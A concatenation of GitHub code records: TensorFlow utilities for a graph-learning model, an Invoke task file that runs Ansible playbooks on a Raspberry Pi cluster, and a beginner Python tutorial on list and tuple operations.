read_file()\n","repo_name":"jbeltranleon/dags-airflow-certification","sub_path":"dags/sub_dag/main_dag.py","file_name":"main_dag.py","file_ext":"py","file_size_in_byte":942,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"15796262804","text":"import numpy as np\nimport tensorflow as tf\nimport six\nfrom tensorflow.python.framework import tensor_util\nfrom tensorflow.python.ops.losses import util as tf_losses_utils\nfrom tensorflow.keras import backend as K\nfrom tensorflow.python.keras.utils import tf_utils\nfrom tensorflow.python.keras.utils import losses_utils\nfrom tensorflow.python.keras.utils import metrics_utils\nfrom tensorflow.python.ops import math_ops\nfrom tensorflow.python.keras.utils.tf_utils import is_tensor_or_variable\nfrom tensorflow.python.distribute import distribution_strategy_context\nfrom functools import partial\n\ndef euclidean_distance(x, use_fp16=False, use_sqrt=False):\n #x: batchsize*node*featdim => batchsize*node*node\n dot_product = tf.matmul(x, tf.transpose(x, perm=[0, 2, 1]))\n square_norm = tf.linalg.diag_part(dot_product)\n\n distances = tf.expand_dims(square_norm, 2) - 2.0 * dot_product + tf.expand_dims(square_norm, 1)\n distances = tf.maximum(distances, 0.0)\n\n mask = tf.cast(tf.equal(distances, 0.0), tf.float32 if not use_fp16 else tf.float16)\n distances = distances + mask * (1e-16 if not use_fp16 else 1e-5)\n\n if use_sqrt:\n distances = tf.sqrt(distances)\n distances = distances * (1.0 - mask)\n\n return distances\n\ndef norm_lap(A):\n D = tf.reduce_sum(A, axis=2)\n inv_sqrt = tf.pow(D, -0.5)\n inv_sqrt = tf.where(tf.math.is_inf(inv_sqrt), tf.zeros_like(inv_sqrt), inv_sqrt)\n inv_sqrt = tf.linalg.diag(inv_sqrt)\n\n return tf.matmul(tf.matmul(inv_sqrt, tf.linalg.diag(D)- A), tf.transpose(inv_sqrt, [0, 2, 1]))\n\ndef adaptive_sigma(dx, y, eps=1e-3, use_fp16=False):\n T = tf.cast(tf.equal(tf.expand_dims(y,1), tf.expand_dims(y, 2)), tf.float32 if not use_fp16 else tf.float16)\n F =1.0-T\n P = tf.multiply(T, dx)\n N = tf.multiply(F, dx)\n\n a = tf.reduce_sum(P, axis=[1,2], keepdims=True)/tf.reduce_sum(T, axis=[1,2], keepdims=True)\n b = tf.reduce_sum(N, axis=[1,2], keepdims=True)/tf.reduce_sum(F, axis=[1,2], keepdims=True)\n\n a2 = tf.math.square(a)\n b2 = tf.math.square(b+eps)\n\n sigma = tf.math.sqrt((a2-b2)/(2.0*tf.math.log(a2/b2)))\n\n return sigma\n\ndef knn_edge(dx, nodenum, gamma, eps=1e-7, use_fp16=False):\n batchsize = tf.shape(dx)[0]\n \n #remove self\n dx = tf.linalg.set_diag(dx, (1e10 if not use_fp16 else 1e5)*tf.ones([batchsize, nodenum], dtype=tf.float32 if not use_fp16 else tf.float16))\n\n #allgraph: labeled nodes vs labeled nodes\n _, indices = tf.nn.top_k(-dx, k=gamma, sorted=False)\n\n bindices = tf.tile(tf.expand_dims(tf.range(0, batchsize)* nodenum * nodenum, 1), (1, nodenum*gamma))\n gindices = tf.reshape(tf.tile(tf.expand_dims(tf.range(0, nodenum) * nodenum, 1),(batchsize, gamma)), [batchsize,-1])\n gindices = gindices + tf.reshape(indices, [batchsize, -1]) + bindices\n gindices = tf.reshape(gindices,(-1,1))\n n_mask = tf.scatter_nd(gindices, tf.ones(tf.shape(gindices), tf.float32 if not use_fp16 else tf.float16), tf.shape(tf.reshape(dx,[-1,1])))\n n_mask = tf.reshape(n_mask, tf.shape(dx))\n\n n_mask = tf.maximum(n_mask, tf.transpose(n_mask, [0,2,1]))\n\n return n_mask\n\ndef binarize(y, c):\n return tf.where(tf.equal(y, c), tf.ones_like(y, tf.float32), tf.negative(tf.ones_like(y, tf.float32)))\n\ndef binarize_gs(y):\n return tf.multiply(tf.where(tf.equal(y, 1), 
tf.ones_like(y, tf.float32), tf.negative(tf.ones_like(y, tf.float32))), tf.cast(tf.not_equal(y, 0), tf.float32))\n\ndef edge_weighting(dx, sigma=None, s=None, e=None, eps=1e-3, directed=False, use_fp16=False):\n if s is not None:\n ms = tf.sqrt(eps + tf.multiply(tf.expand_dims(s, 2), tf.expand_dims(s, 1)))\n dx = tf.multiply(dx, ms)\n\n if sigma is not None:\n if sigma is tf.Tensor:\n w = tf.exp(-tf.square(dx)/(2.0*tf.square(sigma)))\n else:\n w = tf.exp(-tf.square(dx)/(2.0*(sigma**2)))\n else:\n w = tf.exp(-tf.square(dx))\n\n if not directed:\n w = tf.maximum(w, tf.transpose(w, [0,2,1]))\n\n mask = tf.where(tf.greater_equal(w, 1e-5), tf.ones_like(w), tf.zeros_like(w))\n w = tf.multiply(w, mask)\n\n if e is None:\n wdx = dx\n else:\n wdx = tf.cast(tf.less_equal(e, eps), tf.float32 if not use_fp16 else tf.float16) * (1e10 if not use_fp16 else 1e5) + dx\n\n return w, wdx\n\ndef edgeattention(gs, sgs, labelednum, unlabelednum, thres=2.0):\n batchsize = tf.shape(gs)[0]\n absdy = tf.math.abs(sgs - gs)\n m = tf.less_equal(absdy, thres)\n mask = tf.equal(tf.expand_dims(m, 1), tf.expand_dims(m,2))\n mask = tf.where(mask, tf.ones_like(mask, tf.float32), tf.zeros_like(mask, tf.float32))\n return tf.slice(tf.cast(tf.logical_not(m), tf.float32), [0, labelednum], [batchsize, unlabelednum]), mask\n\ndef glr_fidelity(a, y, mu, labelednum, unlabelednum, nodenum, ally=False, normlap=False, kappafactor=1.0):\n batchsize = tf.shape(a)[0]\n\n A = a - tf.linalg.diag(tf.linalg.diag_part(a))\n D = tf.reduce_sum(A, axis=2)\n if normlap:\n L = norm_lap(A)\n else:\n L = tf.linalg.diag(D) - A\n\n if ally:\n gs = tf.reshape(y, (batchsize, nodenum, 1))\n else:\n gs = tf.reshape(tf.concat((y, tf.zeros((batchsize, unlabelednum))), axis=1), (batchsize, nodenum, 1))\n\n if mu is None:\n kappa = 60.0 * kappafactor\n mu_scale = 0.6667\n mu_max = (kappa-1.0)/(2.0* tf.reduce_max(D, axis=1, keepdims=True))\n mu_max = tf.expand_dims(mu_max, -1)\n mu = mu_scale * mu_max\n\n I = tf.eye(nodenum, batch_shape=[batchsize])\n\n sgs = tf.linalg.solve(I+mu*L, gs)\n\n sgs = tf.reshape(sgs, (batchsize, nodenum))\n\n if not ally:\n labeled_gs = tf.slice(y, [0,0], [batchsize, labelednum])\n labeled_sgs = tf.slice(sgs, [0,0], [batchsize, labelednum])\n\n all_gs = tf.concat((labeled_gs, 1000.0*tf.ones((batchsize, unlabelednum), tf.float32)), axis=1)\n all_sgs = tf.concat((labeled_sgs, -1000.0*tf.ones((batchsize, unlabelednum), tf.float32)), axis=1)\n else:\n all_gs = y\n all_sgs = sgs\n\n return sgs, all_gs, all_sgs\n\ndef postprocess_grads(grads, **kwargs):\n clip_norm = kwargs.get(\"clip_norm\", None)\n grads = [None if grad is None else tf.where(tf.math.is_nan(grad), tf.zeros_like(grad), grad) for grad in grads]\n grads = [None if grad is None else tf.where(tf.math.is_inf(grad), tf.zeros_like(grad), grad) for grad in grads]\n if clip_norm is not None:\n grads = [None if grad is None else tf.clip_by_norm(grad, clip_norm) for grad in grads]\n return grads\n\n#x: batchsize*nodenum*nodenum (dists)\n#out: idx = batchsize*nodenum*k\n# mask = batchsize*nodenum*k\ndef knn1d(x, nodenum, batchsize, k=6, eps=1e-7):\n #remove selfloop edge\n noselfx = tf.linalg.set_diag(x, -1e10*tf.ones((batchsize, nodenum)))\n val, idx = tf.nn.top_k(noselfx, k=k)\n mask = tf.cast(tf.greater(val, eps), tf.float32)\n return idx, mask\n\n#x: batchsize*nodenum*featdim (features)\n#mau: batchsize*nodenum\n#out: batchsize*nodenum*(k+1)*featdim\ndef knnfeature(x, idx, mask, batchsize, nodenum, featdim, k=6, mau=None):\n bidx = tf.range(batchsize) * nodenum\n bidx = 
tf.reshape(bidx, [batchsize, 1, 1])\n\n gx = tf.reshape(x, [-1, featdim])\n nx = tf.gather(gx, idx+bidx)\n cx = tf.expand_dims(x, axis=-2)\n tcx = tf.tile(cx, [1, 1, k, 1])\n\n nf = nx-tcx #nf=batchsize*nodenum*k*featdim\n m = tf.expand_dims(mask, axis=-1) #m=batchsize*nodenum*k*1\n mnf = tf.multiply(m, nf)\n\n mm = tf.clip_by_value(mau, 0, k)\n mm = tf.sequence_mask(mm, k, tf.float32)\n mnf = tf.multiply(mnf, tf.expand_dims(mm, 3))\n\n return tf.transpose(tf.concat([cx, mnf], axis=-2), [0, 1, 3, 2])\n\ndef sparse_knn(dx, k, nodenum, eps=1e-7):\n batchsize = tf.shape(dx)[0]\n nodenum = tf.shape(dx)[1]\n\n bindices = tf.tile(tf.expand_dims(tf.range(batchsize)* nodenum * nodenum, 1), (1, nodenum*nodenum))\n gindices = tf.reshape(tf.tile(tf.expand_dims(tf.range(nodenum) * nodenum, 1),(batchsize, nodenum)), [batchsize,-1])\n gindices = gindices + bindices\n\n dx = tf.linalg.set_diag(dx, 1e10*tf.ones([batchsize, nodenum]))\n valid_mask =tf.cast(tf.less(dx, 1e8), tf.float32)\n\n sortedinds = tf.argsort(dx, 2, direction='ASCENDING', stable=True)\n seqmask = tf.sequence_mask(k, nodenum, tf.int32)\n sortedinds = sortedinds *seqmask + (seqmask - 1)*1000000\n sortedginds = tf.reshape(tf.reshape(sortedinds, (batchsize, nodenum*nodenum))+gindices, (-1,))\n\n bool_mask = tf.greater_equal(sortedginds, 0)\n sortedginds = tf.reshape(tf.boolean_mask(sortedginds, bool_mask), (-1,1))\n\n sparse_mask = tf.reshape(tf.scatter_nd(sortedginds, tf.ones(tf.shape(sortedginds), tf.float32), tf.shape(tf.reshape(dx,[-1,1]))), tf.shape(dx)) * valid_mask\n\n sparse_mask = tf.math.maximum(sparse_mask, tf.transpose(sparse_mask, [0,2,1]))\n\n return sparse_mask\n\ndef res_net_block(input_data, filters, conv_size):\n x = tf.keras.layers.Conv1D(filters, conv_size, activation=None, padding='same')(input_data)\n x = tf.keras.layers.Add()([x, input_data])\n x = tf.keras.layers.Activation('relu')(x)\n return x\n\n\ndef dynglr(**kwargs):\n #graph weighting1\n inputs = tf.keras.Input(shape=(kwargs.get(\"fc_inputdim\", 2048),))\n x = tf.keras.layers.Reshape((32, int(kwargs.get(\"fc_inputdim\", 2048)/32)))(inputs)\n x = tf.keras.layers.Conv1D(256, 3, activation='relu', use_bias=False)(x)\n shallows = tf.keras.layers.MaxPooling1D(2)(x)\n x = res_net_block(shallows, 256, 3)\n x = tf.keras.layers.GlobalAveragePooling1D()(x)\n outputs = tf.keras.layers.Dense(32)(x)\n model_gw1 = tf.keras.Model(inputs, [outputs, shallows])\n\n #graph update\n tau = kwargs.get('dynglr_tau', 3)\n inputs1 = tf.keras.Input(shape=(15, 256)) #node features\n inputs2 = tf.keras.Input(shape=((tau+1)*2,)) #tau neigbors' labels\n x1 = tf.keras.layers.Conv1D(112, 3, activation='relu', use_bias=False)(inputs1)\n x1 = tf.keras.layers.GlobalAveragePooling1D()(x1)\n x2 = tf.keras.layers.Dense(16, activation='relu', use_bias=False)(inputs2)\n shallows1 = tf.keras.layers.Concatenate()([x1, x2])\n x12 = tf.keras.layers.Reshape((16, 8))(shallows1)\n x12 = tf.keras.layers.Conv1D(128, 3, activation='relu', use_bias=False)(x12)\n x12 = tf.keras.layers.GlobalAveragePooling1D()(x12)\n outputs1 = tf.keras.layers.Add()([x12, shallows1])\n model_gu = tf.keras.Model([inputs1, inputs2], [outputs1, shallows1])\n\n #graph weighting2\n inputs3 = tf.keras.Input(shape=(15, 256))\n inputs4 = tf.keras.Input(shape=(128,))\n\n x3 = tf.keras.layers.Conv1D(32, 3, activation='relu', use_bias=False)(inputs3)\n x3 = tf.keras.layers.GlobalAveragePooling1D()(x3)\n x4 = tf.keras.layers.Reshape((16, 8))(inputs4)\n x4 = tf.keras.layers.Conv1D(64, 3, activation='relu', use_bias=False)(x4)\n x4 = 
tf.keras.layers.GlobalAveragePooling1D()(x4)\n\n    outputs2 = tf.keras.layers.Concatenate()((x3, x4))\n    model_gw2 = tf.keras.Model([inputs3, inputs4], outputs2)\n\n    return model_gw1, model_gu, model_gw2\n\n\ndef dynglr_knnfeature(y, wd, tau, mau=None):\n    batchsize = tf.shape(y)[0]\n    nodenum = tf.shape(y)[1]\n\n    if tau is not None and tau!=0:\n        idx, mask = knn1d(wd, nodenum, batchsize, tau)\n        fy = knnfeature(y, idx, mask, batchsize, nodenum, 2, tau, mau)\n    else:\n        fy = y\n\n    return fy\n\ndef tf_arch(classes, **kwargs):\n    return dynglr(**kwargs)\n\n\ndef is_sequence(obj):\n    return hasattr(type(obj), '__iter__')\n\ndef lr_constant(lr, step):\n    return lr\n\ndef lr_piecewiseconstant(lrs, stairs, step):\n    # walk to the last stair at or below `step`, then interpolate towards the next stair\n    stair_s = -1\n    for i in range(len(stairs)):\n        if step < stairs[i]:\n            break\n        stair_s = i\n    if stair_s+1 >= len(stairs):\n        return lrs[-1]\n    ret = lrs[stair_s] + (step - stairs[stair_s])*(lrs[stair_s+1] - lrs[stair_s]) / (stairs[stair_s+1] - stairs[stair_s])\n    return ret\n\ndef lr_piecewiselinear(knots, vals, step):\n    return np.interp(step, knots, vals)\n\ndef get_arch_lr(**kwargs):\n    lr_mode = kwargs.get(\"lr_mode\", 'constant')\n    if lr_mode=='constant':\n        return partial(lr_constant, kwargs.get(\"lr_init\", 0.001))\n    elif lr_mode=='piecewise_constant':\n        return partial(lr_piecewiseconstant, kwargs.get(\"lrs\", [0.001, 0.0005, 0.0001, 0.0005, 0.0001, 0.00005]), kwargs.get(\"lr_stairs\", [40, 80, 140, 220, 320, 440]))\n    elif lr_mode=='piecewise_linear':\n        return partial(lr_piecewiselinear, kwargs.get(\"lr_knots\", [0, 2, 8]), kwargs.get(\"lr_vals\", [0, 1.0, 0.1]))\n\nclass CustomLoss2(object):\n    def __init__(self, reduction=losses_utils.ReductionV2.AUTO, name=None):\n        losses_utils.ReductionV2.validate(reduction)\n        self.reduction = reduction\n        self.name = name\n\n    def __call__(self, y_true, y_pred, w, sample_weight=None):\n        scope_name = 'lambda' if self.name == '' else self.name\n        graph_ctx = tf_utils.graph_context_for_symbolic_tensors(\n            y_true, y_pred, w, sample_weight)\n        with K.name_scope(scope_name or self.__class__.__name__), graph_ctx:\n            losses = self.call(y_true, y_pred, w)\n            return losses_utils.compute_weighted_loss(\n                losses, sample_weight, reduction=self._get_reduction())\n\n    @classmethod\n    def from_config(cls, config):\n        return cls(**config)\n\n    def get_config(self):\n        return {'reduction': self.reduction, 'name': self.name}\n\n    def call(self, y_true, y_pred, w):\n        raise NotImplementedError('Must be implemented in subclasses.')\n\n    def _get_reduction(self):\n        if distribution_strategy_context.has_strategy() and (\n            self.reduction == losses_utils.ReductionV2.AUTO or\n            self.reduction == losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE):\n            raise ValueError(\n                'Please use `tf.keras.losses.Reduction.SUM` or '\n                '`tf.keras.losses.Reduction.NONE` for loss reduction when losses are '\n                'used with `tf.distribute.Strategy` outside of the built-in training '\n                'loops. You can implement '\n                '`tf.keras.losses.Reduction.SUM_OVER_BATCH_SIZE` using global batch '\n                'size like:\\n```\\nwith strategy.scope():\\n'\n                '  loss_obj = tf.keras.losses.CategoricalCrossentropy('\n                'reduction=tf.keras.losses.reduction.NONE)\\n....\\n'\n                '  loss = tf.reduce_sum(loss_obj(labels, predictions)) * '\n                '(1. 
\ndef get_arch_lr(**kwargs):\n    lr_mode = kwargs.get(\"lr_mode\", 'constant')\n    if lr_mode=='constant':\n        return partial(lr_constant, kwargs.get(\"lr_init\", 0.001))\n    elif lr_mode=='piecewise_constant':\n        return partial(lr_piecewiseconstant, kwargs.get(\"lrs\", [0.001, 0.0005, 0.0001, 0.0005, 0.0001, 0.00005]), kwargs.get(\"lr_stairs\", [40, 80, 140, 220, 320, 440]))\n    elif lr_mode=='piecewise_linear':\n        return partial(lr_piecewiselinear, kwargs.get(\"lr_knots\", [0, 2, 8]), kwargs.get(\"lr_vals\", [0, 1.0, 0.1]))\n\nclass CustomLoss2(object):\n    def __init__(self, reduction=losses_utils.ReductionV2.AUTO, name=None):\n        losses_utils.ReductionV2.validate(reduction)\n        self.reduction = reduction\n        self.name = name\n\n    def __call__(self, y_true, y_pred, w, sample_weight=None):\n        scope_name = 'lambda' if self.name == '' else self.name\n        graph_ctx = tf_utils.graph_context_for_symbolic_tensors(\n            y_true, y_pred, w, sample_weight)\n        with K.name_scope(scope_name or self.__class__.__name__), graph_ctx:\n            losses = self.call(y_true, y_pred, w)\n            return losses_utils.compute_weighted_loss(\n                losses, sample_weight, reduction=self._get_reduction())\n\n    @classmethod\n    def from_config(cls, config):\n        return cls(**config)\n\n    def get_config(self):\n        return {'reduction': self.reduction, 'name': self.name}\n\n    def call(self, y_true, y_pred, w):\n        raise NotImplementedError('Must be implemented in subclasses.')\n\n    def _get_reduction(self):\n        if distribution_strategy_context.has_strategy() and (\n                self.reduction == losses_utils.ReductionV2.AUTO or\n                self.reduction == losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE):\n            raise ValueError(\n                'Please use `tf.keras.losses.Reduction.SUM` or '\n                '`tf.keras.losses.Reduction.NONE` for loss reduction when losses are '\n                'used with `tf.distribute.Strategy` outside of the built-in training '\n                'loops. You can implement '\n                '`tf.keras.losses.Reduction.SUM_OVER_BATCH_SIZE` using global batch '\n                'size like:\\n```\\nwith strategy.scope():\\n'\n                '    loss_obj = tf.keras.losses.CategoricalCrossentropy('\n                'reduction=tf.keras.losses.reduction.NONE)\\n....\\n'\n                '    loss = tf.reduce_sum(loss_obj(labels, predictions)) * '\n                '(1. / global_batch_size)\\n```\\nPlease see '\n                'https://www.tensorflow.org/alpha/tutorials/distribute/training_loops'\n                ' for more details.')\n\n        if self.reduction == losses_utils.ReductionV2.AUTO:\n            return losses_utils.ReductionV2.SUM_OVER_BATCH_SIZE\n        return self.reduction\n\nclass CustomLossFunctionWrapper2(CustomLoss2):\n    def __init__(self, fn, reduction=losses_utils.ReductionV2.AUTO, name=None, **kwargs):\n        super(CustomLossFunctionWrapper2, self).__init__(reduction=reduction, name=name)\n        self.fn = fn\n        self._fn_kwargs = kwargs\n\n    def call(self, y_true, y_pred, w):\n        if tensor_util.is_tensor(y_pred) and tensor_util.is_tensor(y_true) and tensor_util.is_tensor(w):\n            y_pred, y_true = tf_losses_utils.squeeze_or_expand_dimensions(\n                y_pred, y_true)\n        return self.fn(y_true, y_pred, w, **self._fn_kwargs)\n\n    def get_config(self):\n        config = {}\n        for k, v in six.iteritems(self._fn_kwargs):\n            config[k] = K.eval(v) if tf_utils.is_tensor_or_variable(v) else v\n        base_config = super(CustomLossFunctionWrapper2, self).get_config()\n        return dict(list(base_config.items()) + list(config.items()))\n\ndef tripletloss(y, dx, **kwargs):\n    alpha = kwargs.get('margin', 10.0)\n    T = tf.cast(tf.equal(tf.expand_dims(y,1), tf.expand_dims(y, 2)), tf.float32)\n    F = tf.subtract(1.0, T)\n    P = tf.multiply(T, dx)\n    N = tf.multiply(F, tf.nn.relu(tf.subtract(alpha, dx)))\n    return tf.reduce_mean(P+N)\n\ndef tripletglrloss(y, dx, w, **kwargs):\n    alpha = kwargs.get('margin', 10.0)\n    T = tf.cast(tf.equal(tf.expand_dims(y,1), tf.expand_dims(y, 2)), tf.float32)\n    F = tf.subtract(1.0, T)\n    P = tf.multiply(T, dx)\n    N = tf.multiply(F, tf.nn.relu(tf.subtract(alpha, dx)))\n    return tf.reduce_mean(tf.multiply(P+N, w))\n\nclass TripletGLRLossError(CustomLossFunctionWrapper2):\n    def __init__(self, reduction=losses_utils.ReductionV2.AUTO, name='tripletglrloss_error', **kwargs):\n        super(TripletGLRLossError, self).__init__(tripletglrloss, name=name, reduction=reduction, **kwargs)\n\nclass CustomMeanMetricWrapper2(tf.keras.metrics.Mean):\n    def __init__(self, fn, name=None, dtype=None, **kwargs):\n        super(CustomMeanMetricWrapper2, self).__init__(name=name, dtype=dtype)\n        self._fn = fn\n        self._fn_kwargs = kwargs\n\n    def update_state(self, y_true, y_pred, w, sample_weight=None):\n        y_true = math_ops.cast(y_true, self._dtype)\n        y_pred = math_ops.cast(y_pred, self._dtype)\n        w = math_ops.cast(w, self._dtype)\n\n        [y_true, y_pred], sample_weight = \\\n            metrics_utils.ragged_assert_compatible_and_get_flat_values(\n                [y_true, y_pred], sample_weight)\n\n        y_pred, y_true = tf_losses_utils.squeeze_or_expand_dimensions(\n            y_pred, y_true)\n\n        matches = self._fn(y_true, y_pred, w, **self._fn_kwargs)\n        return super(CustomMeanMetricWrapper2, self).update_state(\n            matches, sample_weight=sample_weight)\n\n    def get_config(self):\n        config = {}\n        for k, v in six.iteritems(self._fn_kwargs):\n            config[k] = K.eval(v) if tf_utils.is_tensor_or_variable(v) else v\n        base_config = super(CustomMeanMetricWrapper2, self).get_config()\n        return dict(list(base_config.items()) + list(config.items()))\n\nclass TripletGLRLoss(CustomMeanMetricWrapper2):\n    def __init__(self, name='tripletglrloss', dtype=None, **kwargs):\n        super(TripletGLRLoss, self).__init__(tripletglrloss, name, dtype=dtype, **kwargs)","repo_name":"yemx21/DynGLR","sub_path":"models/tensorflow/utils_arch.py","file_name":"utils_arch.py","file_ext":"py","file_size_in_byte":17537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"2808671045","text":"\"\"\"\nRaspberry Pi 
Cluster Admin tasks.\n\"\"\"\n\n# This file is used with Invoke - http://www.pyinvoke.org/\n#\n# Ansible is not a good task runner, repetitive actions with long command line\n# arguments are easier with Invoke.\n\nimport os\nimport sys\nimport ansible_runner\nfrom invoke import task, run\n\nif os.getuid() == 0:\n print (\"ERROR: Do not run as root.\")\n sys.exit(1)\n\nprint('\\n')\nprint(' --== Raspberry Pi Cluster administration ==-- ')\nprint('\\n')\n\n\n#\n# tasks for deployer (localhost)\n#\n\n@task\ndef deployer_ansible(c):\n \"\"\" Ansible deployer playbook on Psi (localhost). \"\"\"\n print(\"Running playbook-rpi-deployer.yml\")\n r = ansible_runner.run(private_data_dir='/home/pi/rpi_cluster/ansible', \n inventory='/etc/ansible/inventory/deploy', \n playbook='playbook-rpi-deployer.yml')\n print(\"{}: {}\".format(r.status, r.rc))\n print(\"Final status:\")\n print(r.stats)\n\n@task\ndef deployer_ssh_config(c):\n \"\"\" Generate ~/.ssh/config file from Ansible inventory. \"\"\"\n print(\"Creating new ssh config file\")\n c.run('ansible-playbook --connection=local -e \"runtherole=group-deployer-ssh-client\" -v playbook-rpi-single-role.yml')\n\n@task\ndef deployer_upgrade(c):\n \"\"\" Run upgrade maint role on Deployer. \"\"\"\n print(\"Updating\")\n c.run('ansible-playbook --connection=local -i /etc/ansible/inventory/deploy -e \"runtherole=upgrades\" -v playbook-rpi-single-role.yml')\n\n\n#\n# tasks for specific hosts. \n# \n# Examples:\n#\n# invoke ansible-ping compute\n# invoke ansible-ping all\n\n@task\ndef ansible_ping(c, hostname):\n \"\"\" Ansible Ping a host. example: invoke ansible-ping compute \"\"\"\n c.run(\"ansible %s -m ping;\" % hostname)\n\n@task\ndef ansible_sshd(c, hostname):\n \"\"\" Change default SSH login on new R-Pi. example: invoke ansible_sshd beta \"\"\"\n print(\"Running ssh-server role\")\n c.run('ansible-playbook --limit \"%s\" -e \"ansible_user=pi ansible_ssh_pass=raspberry host_key_checking=False runtherole=ssh-server\" -v playbook-rpi-single-role.yml' % hostname)\n\n@task\ndef serverspec_host(c, hostname):\n \"\"\" ServerSpec test a specific host. \"\"\"\n print(\"Running ServerSpec\")\n c.run(\"cd ../serverspec/ && bash run.sh %s\" % hostname)\n\n\n#\n# lanservices group\n#\n\n@task\ndef lanservices_main_ansible(c):\n \"\"\" Ansible services-main playbook on Alpha and Beta. \"\"\"\n print(\"Running playbook-rpi-lanservices.yml\")\n c.run('ansible-playbook -v playbook-rpi-lanservices.yml')\n\n\n#\n# compute group\n#\n\n@task\ndef compute_ansible_base(c):\n \"\"\" Ansible base playbook on compute group. \"\"\"\n print(\"Running playbook-rpi-compute.yml\")\n r = ansible_runner.run(private_data_dir='/home/pi/rpi_cluster/ansible', \n playbook='playbook-rpi-compute.yml')\n print(\"{}: {}\".format(r.status, r.rc))\n print(\"Final status:\")\n print(r.stats) \n\n@task\ndef compute_ansible_k3s(c):\n \"\"\" Setup lightweight Kubernetes cluster. \"\"\"\n print(\"Running playbook-rpi-compute-k3s.yml\")\n r = ansible_runner.run(private_data_dir='/home/pi/rpi_cluster/ansible', \n playbook='playbook-rpi-compute-k3s.yml')\n print(\"{}: {}\".format(r.status, r.rc))\n print(\"Final status:\")\n print(r.stats) \n\n\n#\n# tasks for all hosts\n#\n\n@task\ndef ansible_gather_facts(c):\n \"\"\" Gather facts on all hosts. \"\"\"\n print(\"Gathering facts\")\n c.run('ansible all -m setup &> /dev/null')\n\n@task\ndef ansible_maint(c):\n \"\"\" upgrade all R-Pi server hosts (includes rolling reboots). 
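\n\n    Typical use, from the deployer node (Invoke exposes the task under a\n    dashed name on the CLI):\n\n        invoke ansible-maint\n    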
\"\"\"\n    print(\"Running playbook-rpi-all-maint.yml\")\n    r = ansible_runner.run(private_data_dir='/home/pi/rpi_cluster/ansible', \n                           playbook='playbook-rpi-all-maint.yml')\n    print(\"{}: {}\".format(r.status, r.rc))\n    print(\"Final status:\")\n    print(r.stats) \n\n@task\ndef serverspec_cluster(c):\n    \"\"\" ServerSpec tests. \"\"\"\n    print(\"Running ServerSpec\")\n    c.run('cd ../serverspec/ && bash run.sh')\n","repo_name":"craig-m/rpi_cluster","sub_path":"ansible/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":3909,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"67"} +{"seq_id":"11099347812","text":"# -*- coding: utf-8 -*-\n\"\"\"\n@Time : 2020/3/22 9:01\n\"\"\"\n# ### List operations\n# (1) Concatenating lists (same as for tuples) +\nlst1 = [1,2,3]\nlst2 = [4,5,6,1]\nlst = lst1 + lst2\nprint(lst)\n\n# (2) Repeating a list (same as for tuples) *\nlst = [2,3]\nres = lst * 3\nprint(res)\n\n# (3) Slicing a list (same as for tuples)\n# Syntax => list[::] full form: [start index : stop index : step]\n\t# (1) [start:] take from the start index through the end of the list\n\t# (2) [:stop] take from the beginning up to the stop index (i.e. stop-1)\n\t# (3) [start:stop] take from the start index up to the stop index (i.e. stop-1)\n\t# (4) [start:stop:step] take elements from start up to stop at the given step\n\t# (5) [:] or [::] take the whole list\n\n\nlst = [\"王11\",\"李22\",\"文33\",\"陈4\",\"温55\",\"刘66\",\"等两会\",\"刘77\"]\n# (1) [start:] take from the start index through the end of the list\nres = lst[3:]\nprint(res)\n\n# (2) [:stop] take from the beginning up to the stop index (i.e. stop-1)\nres = lst[:4]\nprint(res)\n\n# (3) [start:stop] take from the start index up to the stop index (i.e. stop-1)\nres = lst[3:7]\nprint(res)\n\n# (4) [start:stop:step] take elements from start up to stop at the given step\nres = lst[1:7:2]\nprint(res)\n\nres = lst[7:0:-2]\nprint(res)\n\n# (5) [:] or [::] take the whole list\n\nres = lst[:]\nres = lst[::]\nprint(res)\n\n# (4) Reading a list element (same as for tuples)\n# 0 1 2 3 4 forward indices\nlst = [\"宋江\", \"吴用\", \"卢33\", \"林冲\", \"杜十娘\"]\n# -5 -4 -3 -2 -1 reverse indices\nres = lst[4]\nres = lst[-1]\nprint(res)\n\n# (5) Modifying a list (slices allowed)\nlst[0] = \"李11\"\nprint(lst)\n\n# 1. Modifying data through a slice\n'''Iterable data: container types, range objects, iterators'''\n# The elements selected by 1:4 are removed first, then the elements of the iterable are assigned into that position one by one\n\"\"\"No constraint: the number of elements sliced out and the number actually inserted do not have to match\"\"\"\nlst[1:4] = [\"石阡\",\"鲁智深\",\"武松\",\"武大郎\"]\nprint(lst)\n\n# 2. Modifying data through a slice with a step\n\"\"\"Constraint: supply exactly as many elements as the slice selects; the counts must match\"\"\"\nprint(lst[::2])\n# 0 2 4\nlst[::2] = (1,2,3)\nprint(lst)\n\n# (6) Deleting from a list (slices allowed) with the del keyword\nlst = [\"宋江\",\"吴用\",\"卢俊义\",\"林冲\",\"杜十娘\"]\ndel lst[0]\nprint(lst)\n\n# Deletion can also be done through a slice\nlst = [\"宋江\",\"吴用\",\"卢俊义\",\"林冲\",\"杜十娘\"]\ndel lst[1:3]\nprint(lst)\n\n# Put the target right after the del keyword; deleting res below only removes the variable res and does not touch the list.\nres = lst[1:3]\ndel res\nprint(lst)\n\n# Tuple operations\n\"\"\"\nNone of a tuple's first-level elements can be modified,\nbut if it holds a nested mutable container, the second (or deeper) level inside the tuple can be modified\n\"\"\"\ntuplevar = (1,4,4,5,6,[434,645,43,(234,)])\nres = tuplevar[-1]\nprint(res)\nres[-2] = 88\nprint(tuplevar) #(1, 4, 4, 5, 6, [434, 645, 88, (234,)])\n\n# Set members and dict keys must be hashable data => immutable types (int bool float complex str tuple)\n# setvar = {(1,2,3,4,5,6,[7,8,9])} # error unhashable type: 'list'\n","repo_name":"Sam6006/python-learning","sub_path":"day03/05.列表的相关操作.py","file_name":"05.列表的相关操作.py","file_ext":"py","file_size_in_byte":3232,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"67"} +{"seq_id":"34937285983","text":"import gi\n\ngi.require_version(\"Gtk\", \"3.0\")\nfrom gi.repository import Gtk\n#from GTKGUI.gtkWidgets.filechooser import FileChooser\n#from easyhybrid.pDynamoMethods.pDynamo2Vismol import *\nimport gc\nimport os\n\nVISMOL_HOME = os.environ.get('VISMOL_HOME')\nHOME = os.environ.get('HOME')\n\n\nclass 